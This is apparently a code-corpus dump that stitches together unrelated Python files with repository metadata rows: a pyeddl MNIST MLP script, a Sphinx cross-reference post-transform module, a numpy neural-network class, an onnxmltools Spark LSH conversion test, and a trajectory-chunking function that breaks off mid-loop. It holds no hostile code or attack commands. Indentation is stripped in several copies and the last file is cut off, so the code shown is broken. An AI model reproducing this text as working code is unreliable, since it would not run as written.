# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""\
Basic MLP for MNIST with initializers.
"""
import argparse
import sys
import pyeddl.eddl as eddl
from pyeddl.tensor import Tensor
MEM_CHOICES = ("low_mem", "mid_mem", "full_mem")
def main(args):
eddl.download_mnist()
num_classes = 10
in_ = eddl.Input([784])
layer = in_
layer = eddl.ReLu(eddl.GlorotNormal(eddl.Dense(layer, 1024)))
layer = eddl.ReLu(eddl.GlorotUniform(eddl.Dense(layer, 1024)))
layer = eddl.ReLu(eddl.RandomNormal(eddl.Dense(layer, 1024)))
out = eddl.Softmax(eddl.Dense(layer, num_classes))
net = eddl.Model([in_], [out])
eddl.build(
net,
eddl.sgd(0.01, 0.9),
["soft_cross_entropy"],
["categorical_accuracy"],
eddl.CS_GPU(mem=args.mem) if args.gpu else eddl.CS_CPU(mem=args.mem)
)
eddl.summary(net)
eddl.plot(net, "model.pdf")
x_train = Tensor.load("mnist_trX.bin")
y_train = Tensor.load("mnist_trY.bin")
x_test = Tensor.load("mnist_tsX.bin")
y_test = Tensor.load("mnist_tsY.bin")
if args.small:
x_train = x_train.select([":6000"])
y_train = y_train.select([":6000"])
x_test = x_test.select([":1000"])
y_test = y_test.select([":1000"])
x_train.div_(255.0)
x_test.div_(255.0)
eddl.fit(net, [x_train], [y_train], args.batch_size, args.epochs)
eddl.evaluate(net, [x_test], [y_test], bs=args.batch_size)
print("All done")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--epochs", type=int, metavar="INT", default=10)
parser.add_argument("--batch-size", type=int, metavar="INT", default=1000)
parser.add_argument("--gpu", action="store_true")
parser.add_argument("--small", action="store_true")
parser.add_argument("--mem", metavar="|".join(MEM_CHOICES),
choices=MEM_CHOICES, default="low_mem")
main(parser.parse_args(sys.argv[1:]))
| 34.781609
| 79
| 0.692333
|
import argparse
import sys
import pyeddl.eddl as eddl
from pyeddl.tensor import Tensor
MEM_CHOICES = ("low_mem", "mid_mem", "full_mem")
def main(args):
eddl.download_mnist()
num_classes = 10
in_ = eddl.Input([784])
layer = in_
layer = eddl.ReLu(eddl.GlorotNormal(eddl.Dense(layer, 1024)))
layer = eddl.ReLu(eddl.GlorotUniform(eddl.Dense(layer, 1024)))
layer = eddl.ReLu(eddl.RandomNormal(eddl.Dense(layer, 1024)))
out = eddl.Softmax(eddl.Dense(layer, num_classes))
net = eddl.Model([in_], [out])
eddl.build(
net,
eddl.sgd(0.01, 0.9),
["soft_cross_entropy"],
["categorical_accuracy"],
eddl.CS_GPU(mem=args.mem) if args.gpu else eddl.CS_CPU(mem=args.mem)
)
eddl.summary(net)
eddl.plot(net, "model.pdf")
x_train = Tensor.load("mnist_trX.bin")
y_train = Tensor.load("mnist_trY.bin")
x_test = Tensor.load("mnist_tsX.bin")
y_test = Tensor.load("mnist_tsY.bin")
if args.small:
x_train = x_train.select([":6000"])
y_train = y_train.select([":6000"])
x_test = x_test.select([":1000"])
y_test = y_test.select([":1000"])
x_train.div_(255.0)
x_test.div_(255.0)
eddl.fit(net, [x_train], [y_train], args.batch_size, args.epochs)
eddl.evaluate(net, [x_test], [y_test], bs=args.batch_size)
print("All done")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--epochs", type=int, metavar="INT", default=10)
parser.add_argument("--batch-size", type=int, metavar="INT", default=1000)
parser.add_argument("--gpu", action="store_true")
parser.add_argument("--small", action="store_true")
parser.add_argument("--mem", metavar="|".join(MEM_CHOICES),
choices=MEM_CHOICES, default="low_mem")
main(parser.parse_args(sys.argv[1:]))
| true
| true
|
1c424050ab858e63b10d2aa80a83c2f500499ff2
| 9,734
|
py
|
Python
|
instruction_env/Lib/site-packages/sphinx/transforms/post_transforms/__init__.py
|
hanhtong/Effective-Instructions-
|
a1766f300c4e613b4ce10e9b6eae1b14e43c7d60
|
[
"MIT"
] | 3
|
2021-07-30T19:07:06.000Z
|
2021-08-28T19:35:40.000Z
|
instruction_env/Lib/site-packages/sphinx/transforms/post_transforms/__init__.py
|
hanhtong/Effective-Instructions-
|
a1766f300c4e613b4ce10e9b6eae1b14e43c7d60
|
[
"MIT"
] | 7
|
2020-12-04T04:10:42.000Z
|
2021-03-16T00:53:09.000Z
|
env/lib/python3.9/site-packages/sphinx/transforms/post_transforms/__init__.py
|
simotwo/AbileneParadox-ddd
|
c85961efb37aba43c0d99ed1c36d083507e2b2d3
|
[
"MIT"
] | 1
|
2021-01-20T01:58:53.000Z
|
2021-01-20T01:58:53.000Z
|
"""
sphinx.transforms.post_transforms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Docutils transforms used by Sphinx.
:copyright: Copyright 2007-2021 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from typing import Any, Dict, List, Optional, Tuple, Type, cast
from docutils import nodes
from docutils.nodes import Element
from sphinx import addnodes
from sphinx.addnodes import pending_xref
from sphinx.application import Sphinx
from sphinx.domains import Domain
from sphinx.errors import NoUri
from sphinx.locale import __
from sphinx.transforms import SphinxTransform
from sphinx.util import logging
from sphinx.util.docutils import SphinxTranslator
from sphinx.util.nodes import process_only_nodes
logger = logging.getLogger(__name__)
class SphinxPostTransform(SphinxTransform):
"""A base class of post-transforms.
Post transforms are invoked to modify the document to restructure it for outputting.
They do resolving references, convert images, special transformation for each output
formats and so on. This class helps to implement these post transforms.
"""
builders = () # type: Tuple[str, ...]
formats = () # type: Tuple[str, ...]
def apply(self, **kwargs: Any) -> None:
if self.is_supported():
self.run(**kwargs)
def is_supported(self) -> bool:
"""Check this transform working for current builder."""
if self.builders and self.app.builder.name not in self.builders:
return False
if self.formats and self.app.builder.format not in self.formats:
return False
return True
def run(self, **kwargs: Any) -> None:
"""main method of post transforms.
Subclasses should override this method instead of ``apply()``.
"""
raise NotImplementedError
class ReferencesResolver(SphinxPostTransform):
"""
Resolves cross-references on doctrees.
"""
default_priority = 10
def run(self, **kwargs: Any) -> None:
for node in self.document.traverse(addnodes.pending_xref):
contnode = cast(nodes.TextElement, node[0].deepcopy())
newnode = None
typ = node['reftype']
target = node['reftarget']
refdoc = node.get('refdoc', self.env.docname)
domain = None
try:
if 'refdomain' in node and node['refdomain']:
# let the domain try to resolve the reference
try:
domain = self.env.domains[node['refdomain']]
except KeyError as exc:
raise NoUri(target, typ) from exc
newnode = domain.resolve_xref(self.env, refdoc, self.app.builder,
typ, target, node, contnode)
# really hardwired reference types
elif typ == 'any':
newnode = self.resolve_anyref(refdoc, node, contnode)
# no new node found? try the missing-reference event
if newnode is None:
newnode = self.app.emit_firstresult('missing-reference', self.env,
node, contnode,
allowed_exceptions=(NoUri,))
# still not found? warn if node wishes to be warned about or
# we are in nit-picky mode
if newnode is None:
self.warn_missing_reference(refdoc, typ, target, node, domain)
except NoUri:
newnode = contnode
node.replace_self(newnode or contnode)
def resolve_anyref(self, refdoc: str, node: pending_xref, contnode: Element) -> Element:
"""Resolve reference generated by the "any" role."""
stddomain = self.env.get_domain('std')
target = node['reftarget']
results = [] # type: List[Tuple[str, Element]]
# first, try resolving as :doc:
doc_ref = stddomain.resolve_xref(self.env, refdoc, self.app.builder,
'doc', target, node, contnode)
if doc_ref:
results.append(('doc', doc_ref))
# next, do the standard domain (makes this a priority)
results.extend(stddomain.resolve_any_xref(self.env, refdoc, self.app.builder,
target, node, contnode))
for domain in self.env.domains.values():
if domain.name == 'std':
continue # we did this one already
try:
results.extend(domain.resolve_any_xref(self.env, refdoc, self.app.builder,
target, node, contnode))
except NotImplementedError:
# the domain doesn't yet support the new interface
# we have to manually collect possible references (SLOW)
for role in domain.roles:
res = domain.resolve_xref(self.env, refdoc, self.app.builder,
role, target, node, contnode)
if res and isinstance(res[0], nodes.Element):
results.append(('%s:%s' % (domain.name, role), res))
# now, see how many matches we got...
if not results:
return None
if len(results) > 1:
def stringify(name: str, node: Element) -> str:
reftitle = node.get('reftitle', node.astext())
return ':%s:`%s`' % (name, reftitle)
candidates = ' or '.join(stringify(name, role) for name, role in results)
logger.warning(__('more than one target found for \'any\' cross-'
'reference %r: could be %s'), target, candidates,
location=node)
res_role, newnode = results[0]
# Override "any" class with the actual role type to get the styling
# approximately correct.
res_domain = res_role.split(':')[0]
if (len(newnode) > 0 and
isinstance(newnode[0], nodes.Element) and
newnode[0].get('classes')):
newnode[0]['classes'].append(res_domain)
newnode[0]['classes'].append(res_role.replace(':', '-'))
return newnode
def warn_missing_reference(self, refdoc: str, typ: str, target: str,
node: pending_xref, domain: Optional[Domain]) -> None:
warn = node.get('refwarn')
if self.config.nitpicky:
warn = True
if self.config.nitpick_ignore:
dtype = '%s:%s' % (domain.name, typ) if domain else typ
if (dtype, target) in self.config.nitpick_ignore:
warn = False
# for "std" types also try without domain name
if (not domain or domain.name == 'std') and \
(typ, target) in self.config.nitpick_ignore:
warn = False
if not warn:
return
if self.app.emit_firstresult('warn-missing-reference', domain, node):
return
elif domain and typ in domain.dangling_warnings:
msg = domain.dangling_warnings[typ]
elif node.get('refdomain', 'std') not in ('', 'std'):
msg = (__('%s:%s reference target not found: %%(target)s') %
(node['refdomain'], typ))
else:
msg = __('%r reference target not found: %%(target)s') % typ
logger.warning(msg % {'target': target},
location=node, type='ref', subtype=typ)
class OnlyNodeTransform(SphinxPostTransform):
default_priority = 50
def run(self, **kwargs: Any) -> None:
# A comment on the comment() nodes being inserted: replacing by [] would
# result in a "Losing ids" exception if there is a target node before
# the only node, so we make sure docutils can transfer the id to
# something, even if it's just a comment and will lose the id anyway...
process_only_nodes(self.document, self.app.builder.tags)
class SigElementFallbackTransform(SphinxPostTransform):
"""Fallback desc_sig_element nodes to inline if translator does not supported them."""
default_priority = 200
SIG_ELEMENTS = [addnodes.desc_sig_name,
addnodes.desc_sig_operator,
addnodes.desc_sig_punctuation]
def run(self, **kwargs: Any) -> None:
def has_visitor(translator: Type[nodes.NodeVisitor], node: Type[Element]) -> bool:
return hasattr(translator, "visit_%s" % node.__name__)
translator = self.app.builder.get_translator_class()
if isinstance(translator, SphinxTranslator):
# subclass of SphinxTranslator supports desc_sig_element nodes automatically.
return
if all(has_visitor(translator, node) for node in self.SIG_ELEMENTS):
# the translator supports all desc_sig_element nodes
return
else:
self.fallback()
def fallback(self) -> None:
for node in self.document.traverse(addnodes.desc_sig_element):
newnode = nodes.inline()
newnode.update_all_atts(node)
newnode.extend(node)
node.replace_self(newnode)
def setup(app: Sphinx) -> Dict[str, Any]:
app.add_post_transform(ReferencesResolver)
app.add_post_transform(OnlyNodeTransform)
app.add_post_transform(SigElementFallbackTransform)
return {
'version': 'builtin',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
| 41.776824
| 92
| 0.581981
|
from typing import Any, Dict, List, Optional, Tuple, Type, cast
from docutils import nodes
from docutils.nodes import Element
from sphinx import addnodes
from sphinx.addnodes import pending_xref
from sphinx.application import Sphinx
from sphinx.domains import Domain
from sphinx.errors import NoUri
from sphinx.locale import __
from sphinx.transforms import SphinxTransform
from sphinx.util import logging
from sphinx.util.docutils import SphinxTranslator
from sphinx.util.nodes import process_only_nodes
logger = logging.getLogger(__name__)
class SphinxPostTransform(SphinxTransform):
builders = ()
formats = ()
def apply(self, **kwargs: Any) -> None:
if self.is_supported():
self.run(**kwargs)
def is_supported(self) -> bool:
if self.builders and self.app.builder.name not in self.builders:
return False
if self.formats and self.app.builder.format not in self.formats:
return False
return True
def run(self, **kwargs: Any) -> None:
raise NotImplementedError
class ReferencesResolver(SphinxPostTransform):
default_priority = 10
def run(self, **kwargs: Any) -> None:
for node in self.document.traverse(addnodes.pending_xref):
contnode = cast(nodes.TextElement, node[0].deepcopy())
newnode = None
typ = node['reftype']
target = node['reftarget']
refdoc = node.get('refdoc', self.env.docname)
domain = None
try:
if 'refdomain' in node and node['refdomain']:
try:
domain = self.env.domains[node['refdomain']]
except KeyError as exc:
raise NoUri(target, typ) from exc
newnode = domain.resolve_xref(self.env, refdoc, self.app.builder,
typ, target, node, contnode)
elif typ == 'any':
newnode = self.resolve_anyref(refdoc, node, contnode)
if newnode is None:
newnode = self.app.emit_firstresult('missing-reference', self.env,
node, contnode,
allowed_exceptions=(NoUri,))
if newnode is None:
self.warn_missing_reference(refdoc, typ, target, node, domain)
except NoUri:
newnode = contnode
node.replace_self(newnode or contnode)
def resolve_anyref(self, refdoc: str, node: pending_xref, contnode: Element) -> Element:
stddomain = self.env.get_domain('std')
target = node['reftarget']
results = []
doc_ref = stddomain.resolve_xref(self.env, refdoc, self.app.builder,
'doc', target, node, contnode)
if doc_ref:
results.append(('doc', doc_ref))
results.extend(stddomain.resolve_any_xref(self.env, refdoc, self.app.builder,
target, node, contnode))
for domain in self.env.domains.values():
if domain.name == 'std':
continue
try:
results.extend(domain.resolve_any_xref(self.env, refdoc, self.app.builder,
target, node, contnode))
except NotImplementedError:
# we have to manually collect possible references (SLOW)
for role in domain.roles:
res = domain.resolve_xref(self.env, refdoc, self.app.builder,
role, target, node, contnode)
if res and isinstance(res[0], nodes.Element):
results.append(('%s:%s' % (domain.name, role), res))
# now, see how many matches we got...
if not results:
return None
if len(results) > 1:
def stringify(name: str, node: Element) -> str:
reftitle = node.get('reftitle', node.astext())
return ':%s:`%s`' % (name, reftitle)
candidates = ' or '.join(stringify(name, role) for name, role in results)
logger.warning(__('more than one target found for \'any\' cross-'
'reference %r: could be %s'), target, candidates,
location=node)
res_role, newnode = results[0]
# Override "any" class with the actual role type to get the styling
# approximately correct.
res_domain = res_role.split(':')[0]
if (len(newnode) > 0 and
isinstance(newnode[0], nodes.Element) and
newnode[0].get('classes')):
newnode[0]['classes'].append(res_domain)
newnode[0]['classes'].append(res_role.replace(':', '-'))
return newnode
def warn_missing_reference(self, refdoc: str, typ: str, target: str,
node: pending_xref, domain: Optional[Domain]) -> None:
warn = node.get('refwarn')
if self.config.nitpicky:
warn = True
if self.config.nitpick_ignore:
dtype = '%s:%s' % (domain.name, typ) if domain else typ
if (dtype, target) in self.config.nitpick_ignore:
warn = False
# for "std" types also try without domain name
if (not domain or domain.name == 'std') and \
(typ, target) in self.config.nitpick_ignore:
warn = False
if not warn:
return
if self.app.emit_firstresult('warn-missing-reference', domain, node):
return
elif domain and typ in domain.dangling_warnings:
msg = domain.dangling_warnings[typ]
elif node.get('refdomain', 'std') not in ('', 'std'):
msg = (__('%s:%s reference target not found: %%(target)s') %
(node['refdomain'], typ))
else:
msg = __('%r reference target not found: %%(target)s') % typ
logger.warning(msg % {'target': target},
location=node, type='ref', subtype=typ)
class OnlyNodeTransform(SphinxPostTransform):
default_priority = 50
def run(self, **kwargs: Any) -> None:
# A comment on the comment() nodes being inserted: replacing by [] would
# result in a "Losing ids" exception if there is a target node before
# the only node, so we make sure docutils can transfer the id to
# something, even if it's just a comment and will lose the id anyway...
process_only_nodes(self.document, self.app.builder.tags)
class SigElementFallbackTransform(SphinxPostTransform):
default_priority = 200
SIG_ELEMENTS = [addnodes.desc_sig_name,
addnodes.desc_sig_operator,
addnodes.desc_sig_punctuation]
def run(self, **kwargs: Any) -> None:
def has_visitor(translator: Type[nodes.NodeVisitor], node: Type[Element]) -> bool:
return hasattr(translator, "visit_%s" % node.__name__)
translator = self.app.builder.get_translator_class()
if isinstance(translator, SphinxTranslator):
return
if all(has_visitor(translator, node) for node in self.SIG_ELEMENTS):
return
else:
self.fallback()
def fallback(self) -> None:
for node in self.document.traverse(addnodes.desc_sig_element):
newnode = nodes.inline()
newnode.update_all_atts(node)
newnode.extend(node)
node.replace_self(newnode)
def setup(app: Sphinx) -> Dict[str, Any]:
app.add_post_transform(ReferencesResolver)
app.add_post_transform(OnlyNodeTransform)
app.add_post_transform(SigElementFallbackTransform)
return {
'version': 'builtin',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
| true
| true
|
1c42409c2dcd2bc7895d7d82bdf7f199c13bfae3
| 4,020
|
py
|
Python
|
Python_3.6/ANN_class/ANN.py
|
Eclipse-Dominator/machine_learning_ANN_python
|
cb65b1ed6d62544ee8eaa749fb64fa5d3e792f76
|
[
"MIT"
] | 1
|
2018-02-07T11:10:39.000Z
|
2018-02-07T11:10:39.000Z
|
Python_3.6/ANN_class/ANN.py
|
Eclipse-Dominator/machine_learning_ANN_python
|
cb65b1ed6d62544ee8eaa749fb64fa5d3e792f76
|
[
"MIT"
] | 1
|
2018-02-07T11:10:31.000Z
|
2018-02-07T11:10:31.000Z
|
Python_3.6/ANN_class/ANN.py
|
Eclipse-Dominator/machine_learning_ANN_python
|
cb65b1ed6d62544ee8eaa749fb64fa5d3e792f76
|
[
"MIT"
] | 1
|
2018-03-11T15:07:10.000Z
|
2018-03-11T15:07:10.000Z
|
import numpy as np
# Artificial Neural Network
class ANN:
def __init__(self, layer_size_list):
self.input_size = layer_size_list[0]
self.hidden_output_layer = []
self.cost_result = []
self.accuracy_result = []
for layer_index in range(1, len(layer_size_list)):
self.hidden_output_layer.append( NNlayer( layer_size_list[layer_index - 1], layer_size_list[layer_index], self.sigmoid, self.de_sigmoid ) )
def propagate_result(self, network_input, save_result = False):
previous_output = [network_input]
for layer in self.hidden_output_layer:
previous_output = layer.CalculateOutput(previous_output,save_data = save_result)
return previous_output
def mini_batch_training(self, training_data, batch_size, learning_rate = 0.3, total_epoch = 500): # batch_size should be in integer
total_num_training_data = len(training_data)
total_iterations = total_num_training_data // batch_size
np.random.shuffle(training_data)
for z in range(total_epoch):
success_total = 0
cost_total = 0
temp_batch = 0
for i in range(total_iterations):
index = batch_size * i
success, cost = self.batch_SGD(training_data[index:index+batch_size],learning_rate)
temp_batch = len(training_data[index:index+batch_size])
success_total += success
cost_total += cost
self.cost_result.append( cost_total/(temp_batch*total_iterations) )
self.accuracy_result.append( success_total/(temp_batch*total_iterations) )
print("epoch:", z+1, "out of", total_epoch,"| Accuracy:", success_total/(temp_batch*total_iterations))
def batch_SGD(self,training_data,learning_rate):
batch_size = len(training_data)
correct = 0.0
costTot = 0.0
for data in training_data:
network_result = self.propagate_result(data[0],save_result = True)
if np.argmax(network_result) == np.argmax(data[1]):
correct += 1.0
d_cost = network_result - [data[1]]
costTot+=0.5 * np.sum( (d_cost)**2 )
self.backpropagate_result(d_cost)
self.update_layers(batch_size, learning_rate)
return correct, costTot
def update_layers(self, batch_size, learning_rate):
for layer in self.hidden_output_layer:
layer.update_constants(learning_rate, batch_size)
def backpropagate_result(self, d_cost):
final_derivative = d_cost
for layer in reversed(self.hidden_output_layer):
final_derivative = layer.backpropagate_layer(final_derivative)
def sigmoid(self, x): return 1/(1+np.exp(-x))
def de_sigmoid(self, x): return self.sigmoid(x) * ( 1 - self.sigmoid(x) )
class NNlayer:
def __init__(self, previous_nodes, current_nodes, activating_function, derivative_function):
self.weightArr = np.random.random((previous_nodes,current_nodes))*2-1
self.biasArr = np.random.random((1,current_nodes))*2-1
self.activating_function = activating_function # must be iterative
self.derivative_function = derivative_function # must be iterative
self.bias_G_sum = np.copy(self.biasArr) * 0
self.weight_G_sum = np.copy(self.weightArr) * 0
def CalculateOutput(self, previous_layer_output, save_data = False):
pre_activating = np.dot(previous_layer_output, self.weightArr) + self.biasArr
if save_data:
self.derivative_activation = self.derivative_function( pre_activating )
self.previous_layer_output = np.array(previous_layer_output)
return self.activating_function( pre_activating )
def backpropagate_layer(self, next_layer):
bias_G = next_layer * self.derivative_activation
weight_G = np.dot( self.previous_layer_output.T, bias_G )
weight_G = self.previous_layer_output.T.dot( bias_G )
self.bias_G_sum += bias_G
self.weight_G_sum += weight_G
return np.dot( bias_G, self.weightArr.T )
def update_constants(self, learning_rate, batch_size):
self.weightArr -= learning_rate * self.weight_G_sum / batch_size
self.biasArr -= learning_rate * self.bias_G_sum / batch_size
gradient_magnitude = np.linalg.norm(self.bias_G_sum / batch_size) + np.linalg.norm(self.weight_G_sum / batch_size)
self.bias_G_sum *= 0
self.weight_G_sum *= 0
return gradient_magnitude
| 42.315789
| 142
| 0.765672
|
import numpy as np
class ANN:
def __init__(self, layer_size_list):
self.input_size = layer_size_list[0]
self.hidden_output_layer = []
self.cost_result = []
self.accuracy_result = []
for layer_index in range(1, len(layer_size_list)):
self.hidden_output_layer.append( NNlayer( layer_size_list[layer_index - 1], layer_size_list[layer_index], self.sigmoid, self.de_sigmoid ) )
def propagate_result(self, network_input, save_result = False):
previous_output = [network_input]
for layer in self.hidden_output_layer:
previous_output = layer.CalculateOutput(previous_output,save_data = save_result)
return previous_output
def mini_batch_training(self, training_data, batch_size, learning_rate = 0.3, total_epoch = 500):
total_num_training_data = len(training_data)
total_iterations = total_num_training_data // batch_size
np.random.shuffle(training_data)
for z in range(total_epoch):
success_total = 0
cost_total = 0
temp_batch = 0
for i in range(total_iterations):
index = batch_size * i
success, cost = self.batch_SGD(training_data[index:index+batch_size],learning_rate)
temp_batch = len(training_data[index:index+batch_size])
success_total += success
cost_total += cost
self.cost_result.append( cost_total/(temp_batch*total_iterations) )
self.accuracy_result.append( success_total/(temp_batch*total_iterations) )
print("epoch:", z+1, "out of", total_epoch,"| Accuracy:", success_total/(temp_batch*total_iterations))
def batch_SGD(self,training_data,learning_rate):
batch_size = len(training_data)
correct = 0.0
costTot = 0.0
for data in training_data:
network_result = self.propagate_result(data[0],save_result = True)
if np.argmax(network_result) == np.argmax(data[1]):
correct += 1.0
d_cost = network_result - [data[1]]
costTot+=0.5 * np.sum( (d_cost)**2 )
self.backpropagate_result(d_cost)
self.update_layers(batch_size, learning_rate)
return correct, costTot
def update_layers(self, batch_size, learning_rate):
for layer in self.hidden_output_layer:
layer.update_constants(learning_rate, batch_size)
def backpropagate_result(self, d_cost):
final_derivative = d_cost
for layer in reversed(self.hidden_output_layer):
final_derivative = layer.backpropagate_layer(final_derivative)
def sigmoid(self, x): return 1/(1+np.exp(-x))
def de_sigmoid(self, x): return self.sigmoid(x) * ( 1 - self.sigmoid(x) )
class NNlayer:
def __init__(self, previous_nodes, current_nodes, activating_function, derivative_function):
self.weightArr = np.random.random((previous_nodes,current_nodes))*2-1
self.biasArr = np.random.random((1,current_nodes))*2-1
self.activating_function = activating_function
self.derivative_function = derivative_function
self.bias_G_sum = np.copy(self.biasArr) * 0
self.weight_G_sum = np.copy(self.weightArr) * 0
def CalculateOutput(self, previous_layer_output, save_data = False):
pre_activating = np.dot(previous_layer_output, self.weightArr) + self.biasArr
if save_data:
self.derivative_activation = self.derivative_function( pre_activating )
self.previous_layer_output = np.array(previous_layer_output)
return self.activating_function( pre_activating )
def backpropagate_layer(self, next_layer):
bias_G = next_layer * self.derivative_activation
weight_G = np.dot( self.previous_layer_output.T, bias_G )
weight_G = self.previous_layer_output.T.dot( bias_G )
self.bias_G_sum += bias_G
self.weight_G_sum += weight_G
return np.dot( bias_G, self.weightArr.T )
def update_constants(self, learning_rate, batch_size):
self.weightArr -= learning_rate * self.weight_G_sum / batch_size
self.biasArr -= learning_rate * self.bias_G_sum / batch_size
gradient_magnitude = np.linalg.norm(self.bias_G_sum / batch_size) + np.linalg.norm(self.weight_G_sum / batch_size)
self.bias_G_sum *= 0
self.weight_G_sum *= 0
return gradient_magnitude
| true
| true
|
1c4240c3a65bca5c805f1ae7a103998ad6bb6f55
| 2,212
|
py
|
Python
|
tests/sparkml/test_bucketed_random_projection_lsh.py
|
xhochy/onnxmltools
|
cb2782b155ff67dc1e586f36a27c5d032070c801
|
[
"Apache-2.0"
] | null | null | null |
tests/sparkml/test_bucketed_random_projection_lsh.py
|
xhochy/onnxmltools
|
cb2782b155ff67dc1e586f36a27c5d032070c801
|
[
"Apache-2.0"
] | null | null | null |
tests/sparkml/test_bucketed_random_projection_lsh.py
|
xhochy/onnxmltools
|
cb2782b155ff67dc1e586f36a27c5d032070c801
|
[
"Apache-2.0"
] | null | null | null |
# SPDX-License-Identifier: Apache-2.0
import sys
import unittest
import pandas
import numpy
from pyspark.ml.feature import BucketedRandomProjectionLSH
from pyspark.ml.linalg import Vectors
from onnxmltools import convert_sparkml
from onnxmltools.convert.common.data_types import FloatTensorType
from tests.sparkml.sparkml_test_utils import save_data_models, run_onnx_model, compare_results
from tests.sparkml import SparkMlTestCase
class TestBucketedRandomProjectionLSH(SparkMlTestCase):
@unittest.skipIf(sys.platform == 'win32',
reason="UnsatisfiedLinkError")
@unittest.skipIf(sys.version_info < (3, 8),
reason="pickle fails on python 3.7")
def test_bucketed_random_projection_lsh(self):
data = self.spark.createDataFrame([
(0, Vectors.dense([-1.0, -1.0 ]),),
(1, Vectors.dense([-1.0, 1.0 ]),),
(2, Vectors.dense([1.0, -1.0 ]),),
(3, Vectors.dense([1.0, 1.0]),)
], ["id", "features"])
mh = BucketedRandomProjectionLSH(inputCol="features", outputCol="hashes", seed=12345, bucketLength=1.0)
model = mh.fit(data)
feature_count = data.first()[1].size
model_onnx = convert_sparkml(model, 'Sparkml BucketedRandomProjectionLSH', [
('features', FloatTensorType([None, feature_count]))
], spark_session=self.spark)
self.assertTrue(model_onnx is not None)
# run the model
predicted = model.transform(data)
data_np = data.toPandas().features.apply(
lambda x: pandas.Series(x.toArray())).values.astype(numpy.float32)
expected = [
predicted.toPandas().hashes.apply(lambda x: pandas.Series(x)
.map(lambda y: y.values[0])).values.astype(numpy.float32),
]
paths = save_data_models(data_np, expected, model, model_onnx,
basename="SparkmlBucketedRandomProjectionLSH")
onnx_model_path = paths[-1]
output, output_shapes = run_onnx_model(['hashes'], data_np, onnx_model_path)
compare_results(expected, output, decimal=5)
if __name__ == "__main__":
unittest.main()
| 40.962963
| 111
| 0.648282
|
import sys
import unittest
import pandas
import numpy
from pyspark.ml.feature import BucketedRandomProjectionLSH
from pyspark.ml.linalg import Vectors
from onnxmltools import convert_sparkml
from onnxmltools.convert.common.data_types import FloatTensorType
from tests.sparkml.sparkml_test_utils import save_data_models, run_onnx_model, compare_results
from tests.sparkml import SparkMlTestCase
class TestBucketedRandomProjectionLSH(SparkMlTestCase):
@unittest.skipIf(sys.platform == 'win32',
reason="UnsatisfiedLinkError")
@unittest.skipIf(sys.version_info < (3, 8),
reason="pickle fails on python 3.7")
def test_bucketed_random_projection_lsh(self):
data = self.spark.createDataFrame([
(0, Vectors.dense([-1.0, -1.0 ]),),
(1, Vectors.dense([-1.0, 1.0 ]),),
(2, Vectors.dense([1.0, -1.0 ]),),
(3, Vectors.dense([1.0, 1.0]),)
], ["id", "features"])
mh = BucketedRandomProjectionLSH(inputCol="features", outputCol="hashes", seed=12345, bucketLength=1.0)
model = mh.fit(data)
feature_count = data.first()[1].size
model_onnx = convert_sparkml(model, 'Sparkml BucketedRandomProjectionLSH', [
('features', FloatTensorType([None, feature_count]))
], spark_session=self.spark)
self.assertTrue(model_onnx is not None)
predicted = model.transform(data)
data_np = data.toPandas().features.apply(
lambda x: pandas.Series(x.toArray())).values.astype(numpy.float32)
expected = [
predicted.toPandas().hashes.apply(lambda x: pandas.Series(x)
.map(lambda y: y.values[0])).values.astype(numpy.float32),
]
paths = save_data_models(data_np, expected, model, model_onnx,
basename="SparkmlBucketedRandomProjectionLSH")
onnx_model_path = paths[-1]
output, output_shapes = run_onnx_model(['hashes'], data_np, onnx_model_path)
compare_results(expected, output, decimal=5)
if __name__ == "__main__":
unittest.main()
| true
| true
|
1c4245ef50b820bbed08ca2fb090aa1c3a77795b
| 3,699
|
py
|
Python
|
python/lib/lib_care/utils/chunk_traj.py
|
timtyree/bgmc
|
891e003a9594be9e40c53822879421c2b8c44eed
|
[
"MIT"
] | null | null | null |
python/lib/lib_care/utils/chunk_traj.py
|
timtyree/bgmc
|
891e003a9594be9e40c53822879421c2b8c44eed
|
[
"MIT"
] | null | null | null |
python/lib/lib_care/utils/chunk_traj.py
|
timtyree/bgmc
|
891e003a9594be9e40c53822879421c2b8c44eed
|
[
"MIT"
] | null | null | null |
#compute_traj.py
from ..my_initialization import *
from . import *
def chunk_traj(df,pid_lst,width,height, DS, DT, jump_thresh=10., distance_L2_pbc=None, LT_thresh=1, **kwargs):
# d_lst = []
chunk_index=1
if distance_L2_pbc is None:
distance_L2_pbc = get_distance_L2_pbc(width=width,height=height)
for pid in pid_lst:
d_raw = df[df.particle==pid].copy()
#drop any rows before t=100ms
#drop any rows that already have a value in particle2
d_raw.reset_index(inplace=True)#,drop=True)
x_values, y_values, c_values = d_raw[['x','y', 't']].values.T
jump_index_array, spd_lst = find_jumps_non_pbc(x_values,y_values,distance_L2_pbc=distance_L2_pbc,width=width,height=height, DS=DS,DT=DT, jump_thresh=None)#.25)
# jump_index_array_pbc, spd_lst = find_jumps(x_values,y_values,distance_L2_pbc=distance_L2_pbc,width=width,height=height, DS=DS,DT=DT, jump_thresh=None)#.25)
# jump_index_array, spd_lst = find_jumps(x_values,y_values,distance_L2_pbc=distance_L2_pbc,width=width,height=height, DS=DS,DT=DT, jump_thresh=jump_thresh)#.25)
# jump_index_array=sorted(set(jump_index_array).difference(set(jump_index_array_pbc)))
jarry=np.hstack([jump_index_array,-9999])
Nj = jarry.shape[0]
for j,ji in enumerate(jarry):
if ji==-9999:
if len(jump_index_array)==0:
#no jumps exist
d = d_raw
else:
#this is the final jump to the end
ji_prv=jarry[j-1]
d = d_raw.iloc[ji_prv:]#.copy()
elif j==0:
